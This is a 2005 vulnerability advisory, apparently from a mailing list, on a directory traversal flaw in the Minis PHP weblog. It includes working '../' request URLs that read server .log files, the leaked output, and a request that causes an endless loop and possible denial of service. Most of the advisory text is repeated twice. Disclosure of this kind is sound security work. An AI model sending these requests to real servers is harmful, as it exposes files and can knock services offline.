Minis is a tiny, PHP-powered, text-file based weblogging system.
It is easily configured for normal use and it doesnt require any
databases, such as MySQL. Also, with some PHP-knowledge youll be
able to configure Minis endlessly.
Minis doesn't check the month parameter which allows reading any file with .log extension
This vulnerability has been tested with Minis 0.2.1
Details:
- --------
If we want to read /var/log/XFree86.0.log:
REQUEST:
http://[SERVER]/minis/minis.php?month=../../../../../../../../var/log/XF
ree86.0
RETURNS: (looking at source of HTML)
[...]
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Th
is is a pre-release version of XFree86, and is not supported in any
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=wa
y. Bugs may be reported to XFree86 (at) XFree86 (dot) Org [email concealed] and patches submitted
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=to
fixes (at) XFree86 (dot) Org. [email concealed] Before reporting bugs in pre-release versions,
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=pl
ease check the latest version in the XFree86 CVS repository
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=(h
ttp://www.XFree86.Org/cvs).
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=XF
ree86 Version 4.3.0.1 (Debian 4.3.0.dfsg.1-4 20040529113443 root (at) cyberhq.internal.cyberhqz (dot) com [email concealed])
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Re
lease Date: 15 August 2003
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=X Protocol Version 11, Revision 0, Release 6.6
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Bu
ild Operating System: Linux 2.6.6-rc3-bk9 i686 [ELF]
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Bu
ild Date: 29 May 2004
[...]
If we try to read a file that doesn't exist (in this example /var/log/XFree86.log) Minis returns "No such month"
REQUEST:
http://[SERVER]/minis/minis.php?month=../../../../../../../../var/log/XF
ree86
RESPONSE:
No such month.
If we try to read a file the webserver doesn't have autorization to, Minis enters an endless loop which
could cause an incredible amount of bandwith spent by the server or even a DoS
REQUEST:
http://[SERVER]/minis/minis.php?month=../../../../../../../../var/log/au
th
RETURNS:
Warning: fopen(blog/../../../../../../../../var/log/auth.log): failed to open stream: Permission denied in /var/www/minis/minis.php on line 109
../../../../../../../../var/log/auth
Warning: feof(): supplied argument is not a valid stream resource in /var/www/minis/minis.php on line 111
Warning: fgets(): supplied argument is not a valid stream resource in /var/www/minis/minis.php on line 112
Warning: feof(): supplied argument is not a valid stream resource in /var/www/minis/minis.php on line 111
Warning: fgets(): supplied argument is not a valid stream resource in /var/www/minis/minis.php on line 112
[...]
Timeline
- --------
31/12/2004 - Vulnerability found
31/12/2004 - Vendor contacted
16/01/2005 - Vendor hasn't replied. Advisory released
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (MingW32)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org
Hash: SHA1
Title: Minis directory traversal vulnerability
Vulnerability discovery: Madelman <madelman AT iname.com>
Date: 31/12/2004
Severity: Moderate
Summary:
- --------
(from vendor site: http://minis.sourceforge.net/)
Minis is a tiny, PHP-powered, text-file based weblogging system.
It is easily configured for normal use and it doesnt require any
databases, such as MySQL. Also, with some PHP-knowledge youll be
able to configure Minis endlessly.
Minis doesn't check the month parameter which allows reading any file with .log extension
This vulnerability has been tested with Minis 0.2.1
Details:
- --------
If we want to read /var/log/XFree86.0.log:
REQUEST:
http://[SERVER]/minis/minis.php?month=../../../../../../../../var/log/XF
ree86.0
RETURNS: (looking at source of HTML)
[...]
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Th
is is a pre-release version of XFree86, and is not supported in any
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=wa
y. Bugs may be reported to XFree86 (at) XFree86 (dot) Org [email concealed] and patches submitted
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=to
fixes (at) XFree86 (dot) Org. [email concealed] Before reporting bugs in pre-release versions,
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=pl
ease check the latest version in the XFree86 CVS repository
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=(h
ttp://www.XFree86.Org/cvs).
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=XF
ree86 Version 4.3.0.1 (Debian 4.3.0.dfsg.1-4 20040529113443 root (at) cyberhq.internal.cyberhqz (dot) com [email concealed])
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Re
lease Date: 15 August 2003
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=X Protocol Version 11, Revision 0, Release 6.6
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Bu
ild Operating System: Linux 2.6.6-rc3-bk9 i686 [ELF]
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Bu
ild Date: 29 May 2004
[...]
If we try to read a file that doesn't exist (in this example /var/log/XFree86.log) Minis returns "No such month"
REQUEST:
http://[SERVER]/minis/minis.php?month=../../../../../../../../var/log/XF
ree86
RESPONSE:
No such month.
If we try to read a file the webserver doesn't have autorization to, Minis enters an endless loop which
could cause an incredible amount of bandwith spent by the server or even a DoS
REQUEST:
http://[SERVER]/minis/minis.php?month=../../../../../../../../var/log/au
th
RETURNS:
Warning: fopen(blog/../../../../../../../../var/log/auth.log): failed to open stream: Permission denied in /var/www/minis/minis.php on line 109
../../../../../../../../var/log/auth
Warning: feof(): supplied argument is not a valid stream resource in /var/www/minis/minis.php on line 111
Warning: fgets(): supplied argument is not a valid stream resource in /var/www/minis/minis.php on line 112
Warning: feof(): supplied argument is not a valid stream resource in /var/www/minis/minis.php on line 111
Warning: fgets(): supplied argument is not a valid stream resource in /var/www/minis/minis.php on line 112
[...]
Timeline
- --------
31/12/2004 - Vulnerability found
31/12/2004 - Vendor contacted
16/01/2005 - Vendor hasn't replied. Advisory released
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (MingW32)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org
iD8DBQFB6qyg3RWooxY20cIRAg4cAJ41z36lEK44et5nx4V6tspofoo+zACgnLr6
nUEj8oDBySiBN2ScbMinO7s=
=sSF1
-----END PGP SIGNATURE-----
[ reply ]